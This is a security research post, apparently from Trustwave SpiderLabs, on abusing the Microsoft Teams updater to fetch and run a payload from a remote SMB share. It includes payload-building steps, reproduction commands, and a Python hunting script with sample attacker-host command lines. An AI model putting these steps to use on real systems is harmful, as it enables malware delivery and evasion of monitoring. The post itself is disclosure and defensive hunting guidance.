Microsoft Teams Updater Living off the Land


During the global COVID-19 pandemic there has been an increasing trend towards video conferencing solutions, and Trustwave SpiderLabs is exercising extra vigilance in monitoring video conferencing traffic. During our threat hunting we have observed a lot of Microsoft Teams updater traffic. Because this traffic is so noisy, malicious traffic hiding in it may evade the analyst's view, or the updater may even be added to a list of allowed, and therefore unmonitored, applications.

Because of this, I reviewed the previous finding on Microsoft Teams code execution and found that it had been fixed, but not completely.


My original finding allowed a malicious actor to use the MS Teams Updater to download any binary or payload they wish. This technique is typically known as Living Off the Land and is especially dangerous, as it uses known, common software to download malware.

The patch previously provided for Teams was to restrict its ability to update via a URL. Instead, the updater allows local connections via a share or local folder for product updates.

Initially, when I observed this finding, I figured it could still be used as a technique for lateral movement; however, I found the added limitations could be easily bypassed by pointing the updater to a remote SMB share.

Legitimate Events:

%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacted>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacted>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacted>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update

Current Patch

As per the patch, the Microsoft Teams Updater allows only local network paths as an update source: it detects the strings "http/s", ":" and "/" and port numbers in the updater URL, blocks the update and logs the activity under %localappdata%\Microsoft\Teams\SquirrelSetup.log

It allows share access in the local UNC format: \\server\

To exploit this an attacker would need to:

  1. Get the file onto an open shared folder inside the network
  2. Deliver the payload from that share to the victim machine

It looks like a complicated scenario with a long road to travel, but we can make it work.

Remote Samba

To reduce the attack steps, an attacker can create a remote rather than local share. This would allow them to download the remote payload and execute rather than trying to get the payload to a local share as an intermediary step.

I did some research on Samba and configured a Samba server for remote, public access. After a successful setup, I initiated the command execution; the remote payload was downloaded and executed directly by the Microsoft Teams Updater "Update.exe".

Command: Update.exe --update=\\remoteserver\payloadFolder

Vulnerable Endpoint


Offensive Part

To exploit this, a payload that supports the updater framework must be crafted first.

Payload creation:

  1. Extract any nupkg package; in my example, Teams-
    1. Go to %localappdata%/Microsoft/Teams/packages to pick a Microsoft Teams pre-built package
  2. Go to Teams-\lib\net45, drop your shellcode as 'squirrel.exe', and compress the complete folder as 'Teams-'
  3. Calculate the metadata with the command:
    sha1sum Teams- && wc -c < Teams-

    resulting in the output:
    fa8b87f0b995498a6e890c832dcaf968997608d4 Teams- 4695

  4. Create a file named RELEASES, copy the above output into it and save.
  5. The result will be a main directory containing two files: Teams- and RELEASES.
  6. Upload those two files to the remote Samba server:




Since it is a Samba server, you first need to authenticate to it from the Windows "Run" dialog.

Steps to Reproduce:

  1. Go to the target application folder "%localappdata%/Microsoft/Teams/" on the victim system
  2. Run the below command:
    update.exe --update=[Samba server containing the above 2 files]
    e.g. update.exe --update=\\remoteserver\payloadFolder

After a short wait (10-15 seconds), the payload will be downloaded successfully and executed by Microsoft Teams.

Affected parameters:

update.exe --update=\\remoteserver\payloadFolder
update.exe --updateRollback=\\remoteserver\payloadFolder

Exploitation Flow:


Proof of concept:


  • The Microsoft Teams Update.exe binary acts as a LOLBin (Living off the Land binary)
  • Since the installation is in the local user's AppData folder, no privileged access is needed
  • Attackers can use this to disguise their traffic (especially for lateral movement)

Trustwave did reach out to Microsoft on this issue and they responded saying:

“Thank you again for submitting this issue to Microsoft. We determined that this behavior is considered to be by design as "we cannot restrict SMB source for --update because we have customers that apparently rely on this (e.g. folder redirection)."”

Trustwave Recommendations

From the threat hunting perspective:

  1. Utilize EDR solutions and look at "update.exe" command lines for suspicious connections
  2. Hunt for squirrel.exe executables and investigate the size of the file; you can use that to differentiate trojanized squirrels from the legitimate squirrel.exe
    • If you are dealing with the Microsoft Teams "update.exe", validate the size and hash and hunt for any anomalies
  3. Investigate outgoing SMB connections, especially from the Microsoft Teams updater update.exe, or filter SMB connections entirely at the perimeter if they are unnecessary
  4. Ask the customer or IT about any security exclusions placed for Microsoft Teams packages and review the change applied
  5. IT should install Microsoft Teams under the "Program Files" folder so an attacker cannot drop and execute the remote payload; this can be enforced through Group Policy
  6. Disable any kind of update mechanism and set a policy that updates should be pushed only by the IT team
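The following Python hunt is an added example, not code from the original post or from Trustwave or Microsoft. It applies recommendations 1, 2 and 5 above to process-creation records: it picks out update.exe launches whose --update or --updateRollback argument points at a UNC share, scores the share host against an assumed allowlist (TRUSTED_SHARE_HOSTS, an organisation-specific value you must set yourself), notes whether the updater runs from the user-writable AppData location, and flags a squirrel.exe whose size strays from a known-good baseline. The sample events are constructed; field names and the severity scale are this example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumed allowlist of internal file servers that legitimately host Teams
# update folders (folder redirection, as in the "Legitimate Events" above).
# Organisation-specific placeholder values: replace with your own.
TRUSTED_SHARE_HOSTS = {"fileshare", "fileshare.corp.local"}

# The two affected switches named in the post, in either "--update=\\host\dir"
# or "--update \\host\dir" form. Group 2 is the UNC path, group 3 the host.
UNC_TARGET_RE = re.compile(
    r'--(update|updateRollback)(?:=|\s+)"?(\\\\([^\\\s"]+)\\[^\s"]*)',
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
# Updater running from the per-user install location (recommendation 5).
USER_WRITABLE_RE = re.compile(
    r"\\appdata\\local\\microsoft\\teams\\update\.exe", re.IGNORECASE
)


@dataclass
class Finding:
    severity: str                 # "none", "low", "medium" or "high"
    reason: str
    host: Optional[str] = None    # share host named in the command line, if any
    user_writable_install: bool = False


def classify_update_cmdline(cmdline: str) -> Finding:
    """Score one process-creation command line for Teams updater abuse."""
    if "update.exe" not in cmdline.lower():
        return Finding("none", "not a Teams updater launch")
    writable = bool(USER_WRITABLE_RE.search(cmdline))
    m = UNC_TARGET_RE.search(cmdline)
    if m is None:
        if URL_RE.search(cmdline):
            # The current patch blocks URL sources, but the attempt is still worth a look.
            return Finding("low", "URL update source (blocked by updater, log the attempt)",
                           user_writable_install=writable)
        return Finding("none", "no --update/--updateRollback share target",
                       user_writable_install=writable)
    switch, unc, host = m.group(1), m.group(2), m.group(3)
    host_l = host.lower()
    if host_l in TRUSTED_SHARE_HOSTS:
        return Finding("low", f"--{switch} from allowlisted share {unc}", host, writable)
    if IPV4_RE.fullmatch(host_l):
        return Finding("high", f"--{switch} from raw IP address {unc}", host, writable)
    return Finding("medium", f"--{switch} from unrecognised share host {unc}", host, writable)


def hunt(events: List[Tuple[str, str, str]]) -> List[Tuple[str, str, Finding]]:
    """Return (endpoint, user, finding) for every event that is not benign."""
    results = []
    for endpoint, user, cmdline in events:
        finding = classify_update_cmdline(cmdline)
        if finding.severity != "none":
            results.append((endpoint, user, finding))
    return results


def squirrel_size_anomalous(observed_bytes: int, baseline_bytes: int,
                            tolerance: float = 0.05) -> bool:
    """Recommendation 2: a squirrel.exe whose size strays more than `tolerance`
    from the baseline measured on a clean install deserves a hash check."""
    return abs(observed_bytes - baseline_bytes) > tolerance * baseline_bytes


# Constructed process-creation records: (endpoint, user, command line).
SAMPLE_EVENTS = [
    ("WS01", "alice", r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --update \\fileshare\alice\AppData\Roaming\Microsoft\Teams\DownloadedUpdate'),
    ("WS02", "bob",   r'"C:\Users\bob\AppData\Local\Microsoft\Teams\Update.exe" --update'),
    ("WS03", "carol", r'"C:\Users\carol\AppData\Local\Microsoft\Teams\Update.exe" --update=\\203.0.113.10\payloadFolder'),
    ("WS04", "dave",  r'"C:\Users\dave\AppData\Local\Microsoft\Teams\Update.exe" --updateRollback=\\evil-smb.example.net\share'),
    ("WS05", "erin",  r'"C:\Program Files\Microsoft Teams\Update.exe" --update=https://updates.example.net/teams'),
]

if __name__ == "__main__":
    for endpoint, user, f in hunt(SAMPLE_EVENTS):
        tag = " [install in user-writable AppData]" if f.user_writable_install else ""
        print(f"{f.severity:6} {endpoint} {user}: {f.reason}{tag}")
```

Feed the function real command lines from your EDR or Sysmon process-creation events rather than the constructed list; an allowlisted host still comes back as "low" rather than "none" because, as Microsoft's response confirms, the SMB source is not restricted and a trusted file server can itself be the pivot point.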

Trustwave is exercising extra vigilance in monitoring this kind of traffic. We regularly monitor and improve our threat hunting plans for all global cyber events and all organizations can undertake similar operations within their environment. Contact Trustwave about engaging professional threat hunting.
